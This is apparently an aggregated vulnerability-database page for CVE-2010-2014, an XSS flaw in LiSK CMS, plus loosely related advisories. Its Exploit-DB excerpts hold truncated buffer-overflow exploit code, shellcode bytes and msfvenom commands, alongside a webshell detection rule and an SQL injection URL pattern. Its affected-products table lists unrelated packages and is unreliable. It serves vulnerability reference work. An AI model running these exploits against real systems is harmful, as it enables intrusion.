CVE-2010-2014
Published: 2010-05-24
Priority: P4 · 14 · medium · 4.3 (CVSS 2.0) · AV:N/AC:M/Au:N/C:N/I:P/A:N
EPSS: 0.87% (percentile 54.3)
Cross-site scripting (XSS) vulnerability in cp/list_content.php in LiSK CMS 4.4 allows remote attackers to inject arbitrary web script or HTML via the cl or possibly id parameter.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| createch-group | lisk_cms | — | — |
| gnu | cpio | >= 0 < 2.11+dfsg-1ubuntu1.1 | 2.11+dfsg-1ubuntu1.1 |
| gnu | patch | >= 0 < 2.7.1-4ubuntu2.3 | 2.7.1-4ubuntu2.3 |
| openssl | openssl | >= 0 < 1.0.1f-1ubuntu2.1 | 1.0.1f-1ubuntu2.1 |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
| osv | n/a | 6.8 | MEDIUM | n/a |
| vendor_cisco | n/a | 10.0 | CRITICAL | n/a |
| vendor_redhat | n/a | 4.9 | MEDIUM | n/a |
GHSA · ghsa_unreviewed · 2022-05-17
CVE-2010-2014 [MEDIUM] CWE-79 GHSA-fh55-j7vw-9cfq: Cross-site scripting (XSS) vulnerability in cp/list_content
Cross-site scripting (XSS) vulnerability in cp/list_content.php in LiSK CMS 4.4 allows remote attackers to inject arbitrary web script or HTML via the cl or possibly id parameter.
OSV · osv · 2015-06-22 · CVSS 5.8
CVE-2010-4651 patch vulnerabilities
Jakub Wilk discovered that GNU patch did not correctly handle file paths in
patch files. An attacker could specially craft a patch file that could
overwrite arbitrary files with the privileges of the user invoking the program.
This issue only affected Ubuntu 12.04 LTS. (CVE-2010-4651)
László Böszörményi discovered that GNU patch did not correctly handle some
patch files. An attacker could specially craft a patch file that could cause a
denial of service. (CVE-2014-9637)
Jakub Wilk discovered that GNU patch did not correctly handle symbolic links in
git style patch files. An attacker could specially craft a patch file that
could overwrite arbitrary files with the privileges of the user invoking the
program. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10.
OSV · osv · 2015-01-08 · CVSS 6.8
CVE-2014-9112 cpio vulnerabilities
Michal Zalewski discovered an out of bounds write issue in the
process_copy_in function of GNU cpio. An attacker could specially
craft a cpio archive that could create a denial of service or possibly
execute arbitrary code. (CVE-2014-9112)
Jakob Lell discovered a heap-based buffer overflow in the rmt_read__
function of GNU cpio's rmt client functionality. An attacker
controlling a remote rmt server could use this to cause a denial of
service or possibly execute arbitrary code. This issue only affected
Ubuntu 10.04 LTS. (CVE-2010-0624)
OSV · osv · 2014-05-05 · CVSS 4.0
CVE-2010-5298 openssl vulnerabilities
It was discovered that OpenSSL incorrectly handled memory in the
ssl3_read_bytes() function. A remote attacker could use this issue to
possibly cause OpenSSL to crash, resulting in a denial of service.
(CVE-2010-5298)
It was discovered that OpenSSL incorrectly handled memory in the
do_ssl3_write() function. A remote attacker could use this issue to
possibly cause OpenSSL to crash, resulting in a denial of service.
(CVE-2014-0198)
Red Hat · vendor_redhat · 2014-09-24 · CVSS 4.9
CVE-2014-7842 [MEDIUM] kernel: kvm: reporting emulation failures to userspace
Race condition in arch/x86/kvm/x86.c in the Linux kernel before 3.17.4 allows guest OS users to cause a denial of service (guest OS crash) via a crafted application that performs an MMIO transaction or a PIO transaction to trigger a guest userspace emulation error report, a similar issue to CVE-2010-5313.
It was found that reporting emulation failures to user space could lead to either a local (CVE-2014-7842) or a L2->L1 (CVE-2010-5313) denial of service. In the case of a local denial of service, an attacker must have access to the MMIO area or be able to access an I/O port. Please note that on certain systems, HPET is mapped to userspace as part of vdso (vvar) and thus an unprivileged user may generate MMIO transactions (and enter t
Red Hat · vendor_redhat · 2014-09-24 · CVSS 4.9
CVE-2010-5313 [MEDIUM] kernel: kvm: reporting emulation failures to userspace
Race condition in arch/x86/kvm/x86.c in the Linux kernel before 2.6.38 allows L2 guest OS users to cause a denial of service (L1 guest OS crash) via a crafted instruction that triggers an L2 emulation failure report, a similar issue to CVE-2014-7842.
It was found that reporting emulation failures to user space could lead to either a local (CVE-2014-7842) or a L2->L1 (CVE-2010-5313) denial of service. In the case of a local denial of service, an attacker must have access to the MMIO area or be able to access an I/O port. Please note that on certain systems, HPET is mapped to userspace as part of vdso (vvar) and thus an unprivileged user may generate MMIO transactions (and enter the emulator) this way.
Statement: This issue did not af
Cisco · vendor_cisco · 2014-06-05 · CVSS 10.0
CVE-2010-5298 [CRITICAL] Multiple Vulnerabilities in OpenSSL Affecting Cisco Products
Multiple Cisco products incorporate a version of the OpenSSL package affected by one or more vulnerabilities that could allow an unauthenticated, remote attacker to execute arbitrary code, create a denial of service (DoS) condition, or perform a man-in-the-middle attack. On June 5, 2014, the OpenSSL Project released a security advisory detailing seven distinct vulnerabilities. The vulnerabilities are referenced in this document as follows:
SSL/TLS Man-in-the-Middle Vulnerability
DTLS Recursion Flaw Vulnerability
DTLS Invalid Fragment Vulnerability
SSL_MODE_RELEASE_BUFFERS NULL Pointer Dereference Vulnerability
SSL_MODE_RELEASE_BUFFERS Session Injection or Denial of Service Vulnerability
Anonymous ECDH Denial of Service Vulnerab
Suricata · suricata · 2014-03-18
CVE-2010-2861 ET WEB_SERVER WEBSHELL CFM Shell Access
Rule: alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"ET WEB_SERVER WEBSHELL CFM Shell Access"; flow:established,to_client; file.data; content:"CFM shell"; nocase; reference:url,blog.spiderlabs.com/2014/03/coldfusion-admin-compromise-analysis-cve-2010-2861.html; classtype:successful-admin; sid:2018290; rev:3; metadata:created_at 2014_03_18, signature_severity Major, updated_at 2024_03_13;)
Exploit-DB · exploitdb · 2015-04-17 · CVSS 4.6
CVE-2015-2572 [MEDIUM] Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash (PoC)
---
# Exploit Title: Buffer Overflow in Oracle Hyperion Smart View for Office [DOS]
# Exploit Author: sajith
# Vendor Homepage: http://oracle.com
# Vulnerable Version: Fusion Edition 11.1.2.3.000 Build 157
# Vulnerable Link: http://www.oracle.com/technetwork/middleware/smart-view-for-office/downloads/index.html
# Tested in: Microsoft Windows 7 Enterprise 6.1.7601 Service Pack 1 [x64], en-us
# Plugin tested with Microsoft Excel 2010
# CVE: CVE-2015-2572
Responsible Disclosure:
Reported to Oracle on Jul 7, 2014
Patch released on April 14, 2015
How to reproduce the bug?
1) Install "Smart View", open Microsoft Excel and click on the "Smart View" tab
2) Click on "Options" and then click on the "Advanced" tab
3) In General menu in "
Exploit-DB · exploitdb · 2015-01-06
CVE-2014-2973 BulletProof FTP Client - BPS Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'BulletProof FTP Client BPS Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
BulletProof FTP Client 2010, caused by an overly long hostname.
By persuading the victim to open a specially-crafted .BPS file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on
Windows XP SP3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gabor Seljan'
],
'References' =>
[
[ 'EDB', '34162' ],
[ 'EDB', '34540' ],
[ 'EDB', '35449' ],
[
Exploit-DB · exploitdb · 2014-12-03 · CVSS 9.3
CVE-2014-2973 [CRITICAL] BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)
---
#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass stack size limitation for bigger payload. Allocate 2nd
# shellcode in heap and copy back to stack. This exploit use egghunter
# to locate 2nd shellcode in heap and copy to stack using memcpy function.
# Offset
seh = 93
filename = "xsession.bps"
buff = "A" * 400
# ./msfvenom -p windows/messagebox TEXT="Hello Exploit-DB" EXITFUNC=process -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_
Exploit-DB · exploitdb · 2014-11-26
CVE-2014-9448 Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Local Buffer Overflow (SEH)
---
#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli
# Vendor Homepage: not valid anymore
# Software Link: not available
# Version: 3.1.2.1.2010.03.30
# Discovery: ZoRLu / [email protected]
# Tested on: Microsoft Windows XP [Version 5.1.2600]
filename = "3-1-2-1-gb.wax"
seh = 43501
buff = "\x41" * 45000
nops = "\x90" * 16
# ./msfvenom -p windows/exec CMD=calc EXITFUNC=thread -b "\x00\x0a\x0d\x0c\x20" -e x86/shikata_ga_nai -f ruby
sc =
"\xbe\x97\xd4\x64\xe7\xda\xdf\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x32\x83\xc2\x04\x31\x72\x0e\x03\xe5\xda\x86\x12\xf5" +
"\x0b\xcf\xdd\x05\xcc\xb0\x
Exploit-DB · exploitdb · 2014-11-12 · CVSS 7.8
CVE-2014-6352 [HIGH] Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
---
#
# Full exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35216.rar
#
#CVE-2014-6352 OLE Remote Code Execution
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Advanced Hacking Trainings - http://training.aslitsecurity.com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Tested on win7 - office 2007 and 2010. The exploit will not give a UAC warning if the user account is an administrator; otherwise there will be a UAC warning.
#No .inf file is required in this exploit
#The size of executable payload should be less than 400kb
#python 2.7 required
#The folder "temp" should be in same dir as this python file.
# usage - python.exe
Exploit-DB · exploitdb · 2014-10-29
CVE-2014-9448 Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow (Denial of Service) (PoC) EIP Overwrite
---
#EDB Note: DoS - b0f isn't working.
# Title : Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) Buffer Overflow
# Author : ZoRLu / [email protected] / [email protected]
# Home : http://milw00rm.com / it's online
# Date : 28.10.2014
# Python : V 2.7
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
my $file = "exploit.wax"; # don't change the file name; if you do, you must also change $filepath
my $junk = "\x41" x 43516;
my $eip = "\xC3\x9c\xC8\x75"; #75C89CC3 JMP ESP | bad char: \x09\x0a
my $oyala = "\x90" x 100;
# tested on my Windows 7 Ultimate with the file name "exploit.wax"; if the path is not correct for your Windows install, you can change it
Exploit-DB · exploitdb · 2014-10-20
CVE-2014-6352 Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows
Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be
vulnerable. However, based on our testing, the most reliable setup is on Windows platforms
running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such
as using
Exploit-DB · exploitdb · 2014-09-29
Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)
---
# Exploit Title: Microsoft Exchange IIS HTTP Internal IP Disclosure Vulnerability
# Google Dork: NA
# Date: 08/01/2014
# Exploit Author: Nate Power
# Vendor Homepage: microsoft.com
# Software Link: NA
# Version: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# Tested on: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# CVE : NA
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure',
'Description' => %q{
This module tests vulnerable IIS HTTP header file paths on Microsoft Exchange OWA 2003, CAS 2007, 2010, 201
Exploit-DB · exploitdb · 2014-09-05 · CVSS 9.3
CVE-2014-2973 [CRITICAL] BulletProof FTP Client 2010 - Buffer Overflow (SEH)
---
#!/usr/bin/python
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit #
# Date: Sep 05 2014 #
# Vulnerability Discovery: Gabor Seljan #
# Exploit Author: Robert Kugler #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP #
# CVE: CVE-2014-2973 #
# #
# Thanks to corelanc0d3r for his awesome tutorials and help! ;-) #
# The "Enter URL" form is also vulnerable #
#-----------------------------------------------------------------------------#
buffer = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n"
buffer+= "\x20" + "\x90" * 89
buffer+= "\xeb\x06\x90\x90"
Exploit-DB · exploitdb · 2014-07-24 · CVSS 9.3
CVE-2014-2973 [CRITICAL] BulletProof FTP Client 2010 - Buffer Overflow (SEH) (PoC)
---
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
# Date: Jul 24 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP SP3 #
# CVE: CVE-2014-2973 #
#-----------------------------------------------------------------------------#
'''
(a00.9e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=41414141 ecx=007ef590 edx=00000000 esi=017a4f6a edi=017a516a
eip=005c005b esp=0012f594 ebp=0012f610 iopl=0 nv up ei pl zr na pe nc
cs=001
Exploit-DB · exploitdb · 2014-04-16
CVE-2010-5300 Jzip - Buffer Overflow (PoC) (SEH Unicode)
---
#!/usr/bin/python
######################################################
# Exploit title: seh unicode buffer overflow (DOS)
# Date: 16/04/2014
# Exploit Author: motaz reda [motazkhodair[at]gmail.com]
# Software Link : http://www.jzip.com/
# Version: jZip v2.0.0.132900
# Tested On: Windows 7 ultimate
########################################################
import sys, os
filename = "vuln.zip"
buffer = "\x50\x4B\x03\x04\x14\x00\x00"
buffer += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00"
buffer += "\xe4\x0f"
buffer += "\x00\x00\x00"
eo = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
eo += "\x12\x10\x00\x00"
eo += "\x02\x10\x00\x00"
eo += "\x00\x00"
cdf = "\x50\x4B\x01\x02\x14\x00\x14"
cdf +=
Exploit-DB · exploitdb · 2010-05-04
CVE-2014-9558 SmartCMS 2 - SQL Injection
---
============ { Ariko-Security - Advisory #1/5/2010 } =============
SQL injection vulnerability in SmartCMS v.2
Vendor's Description of Software:
# http://www.smartwebsites.com.cy/index.php?pageid=13&lang=en
Dork:
# n/a
Application Info:
# Name: SmartCMS
# Versions: V.2
Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: medium
Fix:
# N/A
Time Table:
# 22/04/2010 - Vendor notified.
Input passed via the "pageid" and "lang" parameters to index.php is not
properly sanitised before being used in a SQL query.
Solution:
# Input validation of "pageid","lang" parameters should be corrected.
Vulnerability:
# http://[site]/index.php?pageid=[SQLi]&lang=[SQLi]
Credit:
# Discovered By: MG
#Advisory:
http://www.ariko-security.com/apr2010/audyt_bezpieczenstw
Bugzilla · bugzilla · 2020-02-19 · CVSS 7.5
CVE-2010-5304 [HIGH] realvnc: Null pointer dereference flaw in ClientCutText message handling
A NULL pointer dereference flaw was found in the way LibVNCServer before 0.9.9 handled certain ClientCutText messages. A remote attacker could use this flaw to crash the VNC server by sending a specially crafted ClientCutText message from a VNC client.
Reference:
http://www.openwall.com/lists/oss-security/2014/09/23/6
This libVNCServer flaw was assigned CVE-2014-6053. A similar flaw was found in RealVNC server which has been assigned CVE-2010-5304.
Discussion:
https://packetstormsecurity.com/files/89160/RealVNC-VNC-Server-Free-Edition-4.1.3-Denial-Of-Service.html contains instructions for reproducing this flaw.
---
External References:
https://packetstormsecurity.com/files/89160/RealVNC-VNC-Server
Bugzilla · bugzilla · 2014-11-13 · CVSS 4.9
CVE-2010-5313 [MEDIUM] kernel: kvm: reporting emulation failures to userspace (bug also covers CVE-2014-7842)
It was found that reporting emulation failures to user space can lead to either a local (CVE-2014-7842) or an L2->L1 (CVE-2010-5313) DoS.
In the case of a local DoS, the attacker needs access to an MMIO area or must be able to generate port accesses. Please note that on certain systems HPET is mapped to userspace as part of the vdso (vvar), and thus an unprivileged user may generate MMIO transactions (and enter the emulator) this way.
Upstream patches:
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=fc3a9157d314
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=a2b9e6c1a35a
Acknowledgements:
Red Hat would like to thank Nadav Amit for reporting this issue.
Discussion:
Created
Bugzilla · bugzilla · 2014-05-05 · CVSS 6.9
CVE-2014-0205 [MEDIUM] kernel: futex: refcount issue in case of requeue
A flaw was found in the way the Linux kernel's futex subsystem handled reference counting in the case of a futex requeue during futex_wait().
An unprivileged local user could use this flaw to crash the system or, potentially, escalate their privileges on the system by dropping one reference too many on either the inode or the mm that backs the memory area of the futex, leading to a use-after-free.
References:
https://lkml.org/lkml/2010/9/16/99
Upstream fix:
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=7ada876a8703f23befbb20a7465a702ee39b1704
Acknowledgements:
The security impact of this issue was discovered by Mateusz Guzik of Red Hat.
Discussion:
Statement:
This issue does not affect the Linux kernel pac
Bugzilla · bugzilla · 2014-04-14 · CVSS 4.0
CVE-2010-5298 [MEDIUM] openssl: freelist misuse causing a possible use-after-free
The following security advisory was reported by OpenBSD:
OpenBSD 5.4 errata 8, Apr 12, 2014: A use-after-free race condition in OpenSSL's read buffer may permit an attacker to inject data from one connection into another.
Reference:
http://ftp.openbsd.org/pub/OpenBSD/patches/5.4/common/008_openssl.patch
http://www.tedunangst.com/flak/post/analysis-of-openssl-freelist-reuse
Discussion:
Analysis:
OpenSSL does its own memory management and maintains a LIFO freelist of available buffers.
In ssl3_read_bytes(), it releases the read buffer even if there is still data inside it.
Later in s3_pkt.c:1058, ssl3_release_read_buffer() is called to allocate another buffer. In a single threaded application the same buffer wo